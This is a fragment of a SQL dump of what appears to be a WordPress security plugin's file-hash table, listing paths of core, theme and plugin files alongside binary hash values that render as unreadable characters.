�\ZKP�','wp-content/themes/hueman/assets/front/img/demo/12-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rsԍ:�>���/�`ڎ4','�6ˠ�\r��V�œ��ü\\�}���q�i\0','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('@�`�rRT������','wp-content/themes/mh-magazine-lite/includes/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('\"[C(tt�-����^','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-db-restore.php',0,'Z�k��\"���\r�u��','Z�k��\"���\r�u��','%B�k�_�3��j8��Z6��ݗb3NX�6\"�d&','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��fݎ;��#T��','�>�:�T���O��;���w_S�ݯ��&','',0,'?'),('E����AXǰČ�|�','wp-content/themes/verbosa/admin/images/image-style-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������F+%3�(�C','\"�/��\"�A#��a���{���0\\h)ژf�g','',0,'?'),('E(J�G^\'�\'�ӕ���','wp-content/themes/fluida/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�#W��Xi1z��B�','\\^:�D��^�8N�!fd��X�\"��%��SD4�','',0,'?'),('JD�\ZS�/�o��77/','wp-content/plugins/wordpress-seo/admin/views/class-yoast-input-select.php',0,'����e�|��(b��','����e�|��(b��','��󀣩���p�a�ξ<ZV���w��I�h	','',0,'?'),('L�;%��-��\Z�*��','wp-content/themes/aqueduct/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f>ƭ����m��','��N�HMfZ�nX�^�YJ�5*��H�	>H/�L','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('c[�wjϠn\"��,(w-','wp-content/themes/verbosa/content/content-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?2�P���dЬ4��','|g�U4����=!s���&�7i�o 2T3�O��','',0,'?'),('g#?�0����3�','wp-content/themes/fluida/admin/defaults.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g)�B�jYi螀��_','��-�����$�[�Xb\r�xq1#@���Kh���','',0,'?'),('r�}�逪*nǔ]L','wp-content/themes/precious-lite/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hHW\r��9Yʌs�62z','����13co�l*h��|���q�:{L��s��','',0,'?'),('����P5��`�)','wp-content/themes/fabulous-fluid/images/no-featured-image-420x283.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǻ#�¹�U��Q;�L��','�]|�W���9~���,�M�:�(�`>��+��','',0,'?'),('��I�\Z}\n���0�','wp-content/themes/relia/inc/css/temps/gold.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6	���yܼ�����','�e9$;*���Bw���1\r�y�����9~','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0}��� T��,�W','[�It�޲�-ݥءO��Y#N	����z&\'','',0,'?'),('�\"B�WZ.�:Qn�','wp-content/themes/hueman/functions/czr/tmpl/modules/slide-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>	� �uF�mƨ�1f','��糓��}��yBv�0��q�+�R{�s�','',0,'?'),('�91Y�Sn	�ÏԚ�','wp-content/themes/skt-construction-lite/images/icon-mail.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��Q���U5�{�.�','�_�U5v�cl���˰�F�#��И@6����','',0,'?'),('� )3]Y�o��c�Ջ','wp-content/themes/skt-construction-lite/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~c�,k�_�&��e��',';��r=l���N-��B��Yv��Е�7^O��','',0,'?'),('��F3@(��','wp-content/plugins/spam-captcha/core/include/tokenize/bower.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pa���a��&}l�_6�','��q\Z2�G�@FQ�9�%@6�����^78Y','',0,'?'),('�G���������и','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/views/view.php',0,'dⷚצ^�D ���','dⷚצ^�D ���','5�e�i��б�[G�\0.c���p�!���@','',0,'?'),('��T3SI~f��n���','wp-content/themes/fabulous-fluid/images/arrow-right-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RI(Mhd�x����','(y?�ʧd��l���*_�@�&�G���6�gr','',0,'?'),('� �i�K���*�lI^','wp-content/themes/nirvana/fonts/ubuntu-l-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�+�cwn6�1�&��','<�#�z�v\nT�7-k	�6��)X���2��','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('�\'��%=���A','wp-content/themes/fluida/admin/images/coffee.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�)U6��','vq�u�eR�G?xd�d<�;\"��i�w�Qp�','',0,'?'),('쩯��b�/�y;�f','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nh��e�S�,����!','��,GK��f���o�a��t}߆#Z��s�v�\'�','',0,'?'),('�jܭ��`F�]		?.','wp-content/themes/hueman/assets/front/img/thumb-small.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yn����v��%D�ʠ','�q��昹��2�dg�R&��i	ify���X ��','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~׬���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('\0�DH��dC�A3.��)','wp-content/themes/illdy/footer.php',0,'�Ժ�˛4�G��i�','�Ժ�˛4�G��i�','G�uiCx~u#y�kl<���\n^0���\']\']','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),('\n�Z`�ОX���','wp-content/plugins/unyson/framework/static/js/ie-fixes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�1����Y\\�/��','�i;ƙ(\07��D�fY97g�ڨIA>�\r�۞','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�\r:����:HhW��','ۙ���j1)h����A��z��~�c3�:�^�','',0,'?'),('*�����]LqRQ~A','wp-content/themes/fluida/admin/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zv��	��/CGi�:\'','�6��f��\'�Ǯ����{�\0�O���l���^','',0,'?'),('>}�/K����q�%','wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('?�>��[��P�z�B','wp-content/themes/illdy/layout/js/widget-upload-image/widget-upload-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�����G�I}RgE�','��U��_����_�&�Ymb���2�zqB�K�1���','',0,'?'),('W��8�kb96��','wp-content/themes/travelify/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��\'��<�#+��R','�!�^ǚ�h�%�Ƴm�=�\r(B�\"G�Ž�p','',0,'?'),('`�U(��k�Wv��','wp-content/plugins/unyson/framework/includes/container-types/tab/class-fw-container-type-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�Wlҭ3��T�w��','�>(�>IC����5_�8>垮/�U���.','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�Ź]J��`n�\r,r�N','\rîV���?T�.�^H�h;��K2���\ZC�;d','',0,'?'),('��z��,���g','wp-content/themes/barletta/fonts/glyphicons-halflings-regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'r2U�������X','3u�2;Wm��j��ۻ����\"\0!4���h0l:','',0,'?'),('����\"�eU2S�\"6)','wp-content/themes/nirvana/includes/theme-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��>���;۩','���\r�4E�W���Y��s�!�i(�J0��O','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�1�g-M��@��','�Eϑ7���^\\0��uy|�]�J���\0�4��z�,','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('�[���������R','wp-content/themes/twentynineteen/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\J��w���','2� ��ă���`�|��K 6<#:Gׯ��s','',0,'?'),('����<M��|����','wp-content/themes/clean-magazine/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�X�8���J�J�w','z=�o\n�\"����`�P��>��ǹ))&@�k�','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!��Q�۳o�4','6�K\Z�bnYYՔu�`��\'����Ǿs)��\\','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q�$���P���','�-�T�L���Z)��|��ÂO�@��@N��#�','',0,'?'),('���~(�7Oi��z�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.schlund.php',0,'^�=����[%\"�x�_','^�=����[%\"�x�_','Ǎ��cUU��L�:����!�_L��\'��Ma','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('�j��3��6��m�VO','wp-content/plugins/unyson/framework/includes/option-types/multi-select/static/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3<�q�1Kk�u���v','�8�ć���\\@sf�O��^6F_øWS��uc�y�','',0,'?'),('�1��m�m��*C��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.lacnic.php',0,'R�CX_b0��m.�','R�CX_b0��m.�','Ӎ�ReJ��.s���/����\Z<dzw(','',0,'?'),('�^��=%sl�S�*�','wp-content/themes/supernews/acmethemes/hooks/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��珕��gJ3͎','����^	�kW�q��Qc��T���%)�e�','',0,'?'),('�Uu#d����x]E','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_flat_75_ffffff_40x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�W*�M@���','⠗�vt�X��3�a���ϟ=�]�M��0�_�\n9','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y^�������','Y	Q�FX��2�2�FW���)���fKSf�','',0,'?'),('�qy���R�~q�ZӜ','wp-content/themes/accelerate/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�ܮӞ�o��q�','I�������b�4y��=�{mj`���;C/x�k*','',0,'?'),('垀FɅ������','wp-content/themes/travelify/languages/sk_SK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(&�s��Cʠ��v�','�:3�)|Wl�㍩0��ʝema,l���','',0,'?'),('�-ФQ�1Ц\r �','wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\0��\\t4����E�','�,%d:?�-�ǯM�!k���gF6�ݱ���R�lj','',0,'?'),('��?���7��Y','wp-content/plugins/unyson/framework/static/libs/unycon/iconmoon-app-selection.json.zip',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�	�z�p�T�jL\'Gf','�_�=뜣|5�����6>���Jk%3��GvZ','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X@�?i� Xc����','���$��\r7�U���M����]���g6‡�>C','',0,'?'),('&�J]z8.걤K�*','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc.php',0,'�#��#FYd����','�#��#FYd����','19Fd���*P�I^Q�� y=H\"�*a��','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('+GI�]$n��o�R�','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_cd0a0a_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P+��:��*���<','imZ�,��\n!E,�|�N�F�s��_j{h','',0,'?'),('1=(����-D���a','wp-content/plugins/spam-captcha/lang/spam_captcha-fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')2by2�3��zƙ�','����T�s܎�l��Z�����ΔG�','',0,'?'),('D&u�NK�yqK��J','wp-content/themes/fluida/resources/styles/editor-style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�#1h-��\'`?��','�`d��0��:#(���-Pl�޲�\'��ˈ�3','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('K:��=�Y��ЃU@�#','wp-content/themes/nirvana/images/socials/Xing.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Õ���֨����l��','D���/tK\'OOG��Kk���;X.�\\˘�AW�','',0,'?'),('N5p��X1�a����','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/mega-menu.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\r)o��d\\)��l��6.','X�T��^�CD�l�\Z�@S���Kp�t\'�F�','',0,'?'),('W�׾�5^��l_�_#�','wp-content/themes/twentynineteen/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�7�2��n��t','��nek�o@�l�_���ky~�YWŢA���','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V	����J	X�q���ڀc�','',0,'?'),('����X/��\0��	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','On�4�r���\'f=','�b�����*�9Y�[]�\rᕂ\'�yԩ�e��','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F6f�9���>�A�ٕ','��P�z����*v�j���������Y5�','',0,'?'),('�-�� N��\"�E�*R','wp-content/themes/relia/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��~#5��1�r��','|�O5��v$O���\0�ػC��8̮�op','',0,'?'),('��>�@ڄ~��`��|','wp-content/themes/nirvana/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��\\���{ ���','襁��G�ƴ��VZ�䇅E�Q&@O)Y�\'W��/','',0,'?'),('�J�97�������?��','wp-content/themes/illdy/layout/images/front-page/front-page-testimonial-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=��*Ⱦ\Z٬{�','�W��kt�{w$�67���t��[o~�,�\0�','',0,'?'),('���(g�N\\��\'�W�','wp-content/themes/sg-window/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Č��7��A�T��i','�����}V��V��\'V����r���Ys��','',0,'?'),('�O�R���C�I�','wp-content/themes/lightly/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�۵�/LB���h�','T(5�Q<9�V���v߱�6��ե�\no{��\rk�','',0,'?'),('��a0�~��*��$0R�','wp-content/themes/nirvana/admin/images/loading-big.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';۱�`V�\0��K��5','�������\rh��l�z�\0h�h��]f9\r�','',0,'?'),('�@���x&��DCH\Z','wp-content/themes/clean-magazine/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3ӅZ*%iĔ�GT�q','�rLT�\ro~*k7.���#?��^`=���ni','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j򬪎$M��0�\0','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('�Ñ:��r��U��|�','wp-content/themes/point/inc/welcome-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u;Oj����~؞$','\\�}����N��?JH�q�7�- I��bܯ\nK','',0,'?'),('پh�E觕���~h�','wp-content/themes/illdy/layout/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�d������7�&v�','�ʏE���T�I�Y���(c�k)�.�����l?','',0,'?'),('����g\'•�i��','wp-content/themes/tortuga/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�\0�\0�\Z\n�v�\0�Gg6','[j/Hc�Nљ������8�n��A�$k���','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J/�	���',',0͜o��l�w}�t����]�x)^�','',0,'?'),('���A�Z��6���','wp-content/themes/illdy/inc/admin/welcome-screen/img/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�j~��Ս:��M��$','!�T��K���{΀>��N�[�\'��,DR���̅*','',0,'?'),('�S	����g	N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_DB��NI�9���Ŷ�','���~DIb�xb{�IdO�.C�����:z/�D5�','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('5w[����]��=��','wp-content/themes/nirvana/content/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����j����5�','pXT5�L@W��g�Cb�%�c���0A��/Y��','',0,'?'),('@�(\'�G�nY�M�','wp-content/plugins/all-in-one-wp-migration/lib/view/main/admin-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���j��T@^-S*','�$��5����?�����N�F>,��','',0,'?'),('D1ⱒ�VΤmX&L��','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�U_dٓ�}EV�L�9','�J9�|:?���o����Z�W�����d�w�&','',0,'?'),('G���P�t�=Y2���','wp-content/themes/tortuga/inc/customizer/default-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x���{O;oBW&9��','d�Ye\r\rOG��!Oΰ&��lP�*I��=R','',0,'?'),('Y�^,�����=e߳�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7O\"8UH	�_�l_','N���A�9��\'[�\r�2}��dC�<׎','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('j?1��ʇ�s,�C�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.at.php',0,'�R�^�����T��o�','�R�^�����T��o�',':Iө�0P~�/_=T[�T�9~m�z(SL�Ϟ{','',0,'?'),('l9�m����/��=��','wp-content/plugins/spam-captcha/screenshot-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+#���M�a����r�','��O��/i�t��ң�R�u�r�p�j�A{j�Y','',0,'?'),('�,DR��[��7�','wp-content/plugins/unyson/framework/languages/fw-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rx;^�UB%kA~�','�TG�5�g#R1J� 	�d����S\\\"�','',0,'?'),('�/�\rӐ}��t�W','wp-content/themes/illdy/layout/images/blog/blog-2.jpeg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��̎0)�+�$&l','g�_�5��,A\0�\"t�8��u����aM��','',0,'?'),('�oV�{���p�l�K*','wp-content/themes/nirvana/languages/de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ll���8mS8','(�����\r�8�=o��%CƬl\"��x�KI�','',0,'?'),('��,‚=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('�ä3��N\';��O���','wp-content/themes/aqueduct/js/dragjs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w?����9U�f','#����g{#���ҙO?+��e�`C�@I1���','',0,'?'),('�\0Ƭ����#���(�','wp-content/themes/twentytwenty/package-lock.json',0,'ڕ�U��ŊcM��d�','ڕ�U��ŊcM��d�','���x�S�X�;�hV�z�\r��e���t�<��','',0,'?'),('�-<@>��e����','wp-content/plugins/spam-captcha/lang/spam_captcha-lt_LT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�id~x�\"�����=��','�ͷ̖\0�̀u\Z��F�[r�9�8X�)4:��','',0,'?'),('��]�Ɖ	��e','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ځ%���u{\'^l�%','y��G9�J!�aZhA �;����6�1�t\\�֧|','',0,'?'),('��9�2	`�5%��z�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/background.js',0,'UXT:gIq�-]��_f��','UXT:gIq�-]��_f��','���.uK�����m:�O\Z�0	�����OT','',0,'?'),('�\Z�7�gO�[t\0π��','wp-content/themes/tortuga/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�y��_sd��V��','���(�Qw\r�Ffe�C1\\6Q*�#R-���3�\\','',0,'?'),('�8OJ���Ej�\0�o�','wp-content/themes/the-minimal/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kpf?�ޡ]�69��','���jǪ�c��?`��H���G)C���_�','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w	�yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('��ԞX�[�`?��^','wp-includes/block-patterns/large-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��x����\\W?��','���䶚��Ցx�k���JҐ���*$��','',0,'?'),('\Z�O���l5fTtŨ�','wp-content/themes/vega/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5 6h:%��rq','������5*n�gJ��\\@�XjWD���\n�','',0,'?'),('\Z@Z!�g�yT�a-','wp-content/plugins/all-in-one-wp-migration/exceptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qD��	� �3���B/(C','*����1i����͹�E��4�Y�yL�NX��','',0,'?'),('\ZU�䷔k�2e���','wp-content/themes/mh-magazine-lite/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�)\"�f���L','�Jx�#+�i��s����6�,��\'alU�#�;A�','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\Z@ۅ����>�+l]�','wp-content/themes/nirvana/images/socials/Tumblr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�@n��\Z����x@','	��Ҿ]C@��G� l`e�Pr|pb�$�T��','',0,'?'),('\ZaE��J�H��|���\\^','wp-content/plugins/unyson/framework/core/components/extensions/manager/class--fw-extensions-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Ԉ�������t�s','ϸ��-������Jg�/F��m�AuJ�A�i~	Q','',0,'?'),('\Zi�^�1�2�$A��n�','wp-content/themes/illdy/languages/illdy.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c4Ɋm,�R�RC4','��\\�6��j�f-��A���t���|oW�G{','',0,'?'),('\ZkF{��*q�ٖ�#�','wp-content/themes/verbosa/style.css',0,'R�>4@\":*�ZGr��','R�>4@\":*�ZGr��','�	d{��